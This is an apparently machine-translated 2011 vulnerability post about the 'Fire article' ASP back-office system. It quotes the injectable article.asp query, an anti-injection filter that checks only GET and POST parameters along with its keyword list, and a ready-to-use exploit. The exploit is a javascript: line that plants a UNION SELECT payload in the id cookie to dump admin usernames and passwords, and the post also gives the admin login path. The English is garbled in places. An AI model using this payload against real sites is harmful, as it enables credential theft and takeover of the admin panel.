Fire article back office management system V2. 1 0day-vulnerability warning-the black bar safety net

2011-04-20T00:00:00
ID MYHACK58:62201130132
Type myhack58
Reporter 佚名
Modified 2011-04-20T00:00:00

Description

Fire article the background management system uses the secondary classification, the interface simple and generous, features simple and easy to use, can be remote automatically upload pictures Delete the article, article related images also be deleted to reduce junk files exist. First open the article. asp see such a statement

</TR></TBODY></TABLE></TD> <TD vAlign=top align=middle width=1 bgColor=#cccccc></TD> <TD vAlign=top align=middle width=5 9 2 bgColor=#ffffff> <% set rs=conn. execute("select * from article where id="&request("id")) full with request received %> <TABLE cellSpacing=0 cellPadding=6 width="9 6%" border=0> <TBODY> <TR> <TD class=xx, vAlign=bottom, height=3 0>■ <%=rs("classname")%> > <%=rs("title")%></TD> </TR></TBODY></TABLE>

Then see the content

<!--# include file="admin/Check_SqlIn. asp" - > Directly open Check_SqlIn. asp

<% 'SQL universal anti-injection procedures,the only need in conn. asp or the like to open the database file before the reference to this page dim sql_injdata SQL_injdata ="'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare" SQL_inj = split(SQL_Injdata,"|")

If Request. QueryString<>"" Then For Each SQL_Get In Request. QueryString For SQL_Data=0 To Ubound(SQL_inj) if instr(Request. QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then Response. Write "<Script Language=JavaScript>alert('hint:please do not in the parameters contain illegal characters try to inject it!'); history. back(-1)</Script>" Response. end end if next Next End If

If Request. Form<>"" Then For Each Sql_Post In The Request. Form For SQL_Data=0 To Ubound(SQL_inj) if instr(Request. Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then Response. Write "<Script Language=JavaScript>alert('hint:please do not in the parameters contain illegal characters try to inject it!'); history. back(-1)</Script>" Response. end end if next next end if

%>

Obviously just filtering get and post

The presence of cookies implanted

Pay on exp

javascript:alert(document. cookie="id="+escape("9 5 and 1=2 union select 1,2,3,user,5,6,password,8,9,1 0,1 1,1 2,1 3,1 4 from admin"));

Backend/admin/admin_login. asp

By:dark on formula